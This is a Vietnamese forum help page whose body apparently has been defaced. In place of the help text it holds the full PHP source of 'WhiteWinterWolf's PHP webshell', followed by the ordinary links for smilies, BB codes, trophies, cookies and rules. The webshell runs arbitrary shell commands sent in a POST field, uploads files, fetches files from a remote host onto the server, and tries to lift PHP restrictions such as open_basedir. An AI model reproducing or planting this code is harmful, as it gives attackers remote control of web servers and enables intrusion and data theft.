Trợ giúp

#. ******************************************************************************/ /* * Optional password settings. * Use the 'passhash.sh' script to generate the hash. * NOTE: the prompt value is tied to the hash! */ $passprompt = "WhiteWinterWolf's PHP webshell: "; $passhash = ""; function e($s) { echo htmlspecialchars($s, ENT_QUOTES); } function h($s) { global $passprompt; if (function_exists('hash_hmac')) { return hash_hmac('sha256', $s, $passprompt); } else { return bin2hex(mhash(MHASH_SHA256, $s, $passprompt)); } } function fetch_fopen($host, $port, $src, $dst) { global $err, $ok; $ret = ''; if (strpos($host, '://') === false) { $host = 'http://' . $host; } else { $host = str_replace(array('ssl://', 'tls://'), 'https://', $host); } $rh = fopen("${host}:${port}${src}", 'rb'); if ($rh !== false) { $wh = fopen($dst, 'wb'); if ($wh !== false) { $cbytes = 0; while (! feof($rh)) { $cbytes += fwrite($wh, fread($rh, 1024)); } fclose($wh); $ret .= "${ok} Fetched file ${dst} (${cbytes} bytes)
"; } else { $ret .= "${err} Failed to open file ${dst}
"; } fclose($rh); } else { $ret = "${err} Failed to open URL ${host}:${port}${src}
"; } return $ret; } function fetch_sock($host, $port, $src, $dst) { global $err, $ok; $ret = ''; $host = str_replace('https://', 'tls://', $host); $s = fsockopen($host, $port); if ($s) { $f = fopen($dst, 'wb'); if ($f) { $buf = ''; $r = array($s); $w = NULL; $e = NULL; fwrite($s, "GET ${src} HTTP/1.0\r\n\r\n"); while (stream_select($r, $w, $e, 5) && !feof($s)) { $buf .= fread($s, 1024); } $buf = substr($buf, strpos($buf, "\r\n\r\n") + 4); fwrite($f, $buf); fclose($f); $ret .= "${ok} Fetched file ${dst} (" . strlen($buf) . " bytes)
"; } else { $ret .= "${err} Failed to open file ${dst}
"; } fclose($s); } else { $ret .= "${err} Failed to connect to ${host}:${port}
"; } return $ret; } ini_set('log_errors', '0'); ini_set('display_errors', '1'); error_reporting(E_ALL); while (@ ob_end_clean()); if (! isset($_SERVER)) { global $HTTP_POST_FILES, $HTTP_POST_VARS, $HTTP_SERVER_VARS; $_FILES = &$HTTP_POST_FILES; $_POST = &$HTTP_POST_VARS; $_SERVER = &$HTTP_SERVER_VARS; } $auth = ''; $cmd = empty($_POST['cmd']) ? '' : $_POST['cmd']; $cwd = empty($_POST['cwd']) ? getcwd() : $_POST['cwd']; $fetch_func = 'fetch_fopen'; $fetch_host = empty($_POST['fetch_host']) ? $_SERVER['REMOTE_ADDR'] : $_POST['fetch_host']; $fetch_path = empty($_POST['fetch_path']) ? '' : $_POST['fetch_path']; $fetch_port = empty($_POST['fetch_port']) ? '80' : $_POST['fetch_port']; $pass = empty($_POST['pass']) ? '' : $_POST['pass']; $url = $_SERVER['REQUEST_URI']; $status = ''; $ok = '☺ :'; $warn = '⚠ :'; $err = '☹ :'; if (! empty($passhash)) { if (function_exists('hash_hmac') || function_exists('mhash')) { $auth = empty($_POST['auth']) ? h($pass) : $_POST['auth']; if (h($auth) !== $passhash) { ?>
"; } } if (! ini_get('allow_url_fopen')) { ini_set('allow_url_fopen', '1'); if (! ini_get('allow_url_fopen')) { if (function_exists('stream_select')) { $fetch_func = 'fetch_sock'; } else { $fetch_func = ''; $status .= "${warn} File fetching disabled ('allow_url_fopen'" . " disabled and 'stream_select()' missing).
"; } } } if (! ini_get('file_uploads')) { ini_set('file_uploads', '1'); if (! ini_get('file_uploads')) { $status .= "${warn} File uploads disabled.
"; } } if (ini_get('open_basedir') && ! ini_set('open_basedir', '')) { $status .= "${warn} open_basedir = " . ini_get('open_basedir') . "
"; } if (! chdir($cwd)) { $cwd = getcwd(); } if (! empty($fetch_func) && ! empty($fetch_path)) { $dst = $cwd . DIRECTORY_SEPARATOR . basename($fetch_path); $status .= $fetch_func($fetch_host, $fetch_port, $fetch_path, $dst); } if (ini_get('file_uploads') && ! empty($_FILES['upload'])) { $dest = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']); if (move_uploaded_file($_FILES['upload']['tmp_name'], $dest)) { $status .= "${ok} Uploaded file ${dest} (" . $_FILES['upload']['size'] . " bytes)
"; } } ?>
enctype="multipart/form-data" >
Fetch: host: port: path:
CWD: Upload:
Cmd:
Clear cmd

${status}

"; } echo "
";
if (! empty($cmd))
{
	echo "";
	e($cmd);
	echo "\n";
	if (DIRECTORY_SEPARATOR == '/')
	{
		$p = popen('exec 2>&1; ' . $cmd, 'r');
	}
	else
	{
		$p = popen('cmd /C "' . $cmd . '" 2>&1', 'r');
	}
	while (! feof($p))
	{
		echo htmlspecialchars(fread($p, 4096), ENT_QUOTES);
		@ flush();
	}
}
echo "
"; exit; ?>

ali

ali

Mặt cười

Điều này cho thấy một danh sách đầy đủ các mặt cười bạn có thể chèn khi đăng bài viết.

BB codes

Danh sách BB codes mà bạn có thể sử dụng để làm nổi nội dung bài viết của bạn. Trang này cho thấy một danh sách tất cả các BB codes có sẵn.

Danh hiệu

Bạn có thể kiếm được danh hiệu bằng cách thực hiện các hành động khác nhau. Trang này cho thấy một danh sách các danh hiệu có sẵn.

Sử dụng cookie

Trang này giải thích việc diễn đàn sử dụng cookies như thế nào.

Các điều khoản và nội quy

Bạn phải đồng ý với các điều khoản và nội quy trước khi sử dụng trang web.